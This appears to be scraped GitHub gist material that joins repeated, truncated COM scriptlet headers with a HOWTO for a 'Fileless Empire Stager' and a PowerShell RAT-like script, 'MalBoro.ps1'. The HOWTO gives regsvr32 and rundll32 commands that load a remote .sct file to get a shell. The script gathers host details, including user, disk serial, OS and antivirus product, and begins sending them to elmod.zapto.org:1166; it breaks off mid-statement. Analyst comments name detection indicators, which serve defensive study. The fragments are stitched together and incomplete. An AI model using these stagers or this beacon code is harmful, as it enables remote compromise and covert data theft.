
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
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
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
@Elm0D
Elm0D / HOWTO
Created May 4, 2017 14:45
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
@Elm0D
Elm0D / MalBoro.ps1
Last active October 30, 2018 17:32
# Analyst notes. The listing is cut off mid-statement inside `post`; only the visible part is described.
# $spl is the field separator ('\') and $vn is a fixed 'Guest' label used as the prefix of the report string.
# info: builds a host-fingerprint string from the machine name, the user name, element [0] of the
#   Win32_LogicalDisk VolumeSerialNumber result, the OS caption plus architecture (rewritten to ' x64'/' x86'),
#   and the AntiVirusProduct displayName read from the root/SecurityCenter2 WMI namespace.
#   It also records whether vbc.exe exists under %windir%\Microsoft.NET\Framework\v2.0.50727 ('YES'/'NO')
#   and whether the registry key HKCU:\vdw0rm exists ('TRUE'/'FALSE').
#   Fields are joined with '\' as 'Guest_<serial>\<machine>\<user>\<os>\<av>\\<YES|NO>\<TRUE|FALSE>\'.
#   Any exception is swallowed: the catch block only sleeps 3 seconds, so nothing is returned in that case.
# post: creates an HTTP request to 'http://elmod.zapto.org:1166/' + $cmdv with method POST and assigns the
#   output of info to the User-Agent header, so the host fingerprint leaves the machine in a request header.
#   What is done with $v and the request stream is not visible here.
# Detection pointers visible in this line: presence of the HKCU:\vdw0rm key; outbound HTTP POSTs to port 1166;
#   a backslash-delimited User-Agent beginning with 'Guest_'; PowerShell querying root/SecurityCenter2 via WMI.
# NOTE(review): the $usb variable name suggests the HKCU:\vdw0rm key marks removable-media spreading; this
#   cannot be confirmed from the visible code.
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1166/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req